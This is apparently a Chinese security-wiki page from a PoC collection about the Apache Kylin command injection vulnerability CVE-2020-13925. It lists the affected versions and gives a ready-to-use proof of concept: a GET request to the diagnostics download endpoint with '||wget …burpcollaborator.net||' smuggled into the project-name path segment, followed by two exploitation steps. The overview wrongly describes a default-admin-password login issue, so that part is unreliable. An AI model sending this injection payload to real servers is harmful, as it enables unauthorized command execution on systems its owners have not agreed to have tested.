menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right POChouse-main chevron_right Apache-Kylin chevron_right 命令注入漏洞(CVE-2020-13925)
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    lightbulb_outline README

    漏洞概述

    黑客可以利用这个漏洞,登录任何管理员账号和密码默认未修改的账号,获得管理员权限。

    影响范围

    Apache Kylin 2.3.0 ~ 2.3.2
    Apache Kylin 2.4.0 ~ 2.4.1
    Apache Kylin 2.5.0 ~ 2.5.2
    Apache Kylin 2.6.0 ~ 2.6.5
    Apache Kylin 3.0.0 ~ 3.0.2

    POC

    原始请求:
    http://host:port/kylin/api/diag/project/learn_kylin/download
    
    PoC请求,GET方法:
    http://host:port/kylin/api/diag/project/%7c%7cwget%20h1j96qoac5o9mbqpkewkhxxa218rwg.burpcollaborator.net%7c%7c/download
    
    将项目名称“learn_kylin”替换为如下payload访问即可:
    ||wget h1j96qoac5o9mbqpkewkhxxa218rwg.burpcollaborator.net||

    EXP

    1、访问 System-Configuration-Diagnosis。触发下载诊断信息的请求 http://host:port/kylin/api/diag/project/learn_kylin/download

    2、发送上方POC